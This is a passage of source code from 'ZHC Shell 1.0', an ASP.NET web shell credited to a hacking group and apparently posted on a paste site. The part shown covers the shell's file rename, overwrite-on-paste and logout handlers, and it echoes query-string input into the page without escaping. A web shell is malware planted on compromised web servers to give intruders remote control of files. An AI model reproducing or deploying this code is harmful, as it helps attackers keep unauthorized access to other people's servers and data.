- <form name="formRn" method="post" action="?action=rename&src=<%=server.UrlEncode(request.QueryString("src"))%>" onSubmit="return checkname();">
- <center><p>You wish to rename <span class="style3"><%=request.QueryString("src")%></span> to: <%=getparentdir(request.QueryString("src"))%>
- <input type="text" name="name" class="TextBox"><br><br>
- <input type="submit" name="Submit3" value="Submit" class="button">
- </p></center>
- </form>
- <script language="javascript">
- function checkname()
- {
- if(formRn.name.value==""){alert("You shall input filename :(");return false}
- }
- </script>
- <%
- else
- if Rename() then
- response.Write("<script>alert('Rename " & replace(url,"\","\\") & " to " & replace(Getparentdir(url) & request.Form("name"),"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
- else
- response.Write("<script>alert('Exist the same name file , rename fail :(');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
- end if
- end if
- case "samename"
- url=request.QueryString("src")
- %>
- <form name="form1" method="post" action="?action=plaster&src=<%=server.UrlEncode(url)%>">
- <p class="style3">Exist the same name file , can you overwrite ?(If you click " no" , it will auto add a number as prefix)</p>
- <input name="OverWrite" type="submit" id="OverWrite" value="Yes" class="button">
- <input name="Cancel" type="submit" id="Cancel" value="No" class="button">
- </form>
- <p>
- <%
- case "logout"
- session.Abandon()
- response.Write("<center>Have a nice day...</center>")
- response.Write("<script>alert(' Goodbye !');location.href='rootshell.aspx" & request.ServerVariables("URL") & "';</sc" & "ript>")
- end select
- end if
- Catch error_x
- response.Write("<br/><center><font color=""red""></font></center>")
- End Try
- %>
- </p>
- <script language="javascript">
- function closewindow()
- {self.close();}
- </script>
- <b><p align="center" valign="bottom" class="footer">ZHC Shell 1.0 • 2011<br/>
- By XXx_Death_xXX Of <a href="http://www.zone-hack.com" target="_blank" title="Welcome to ZHC SHEll"> ZCompany Hacking Crew</a> • zone-hack.com #ZHC</p></b>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement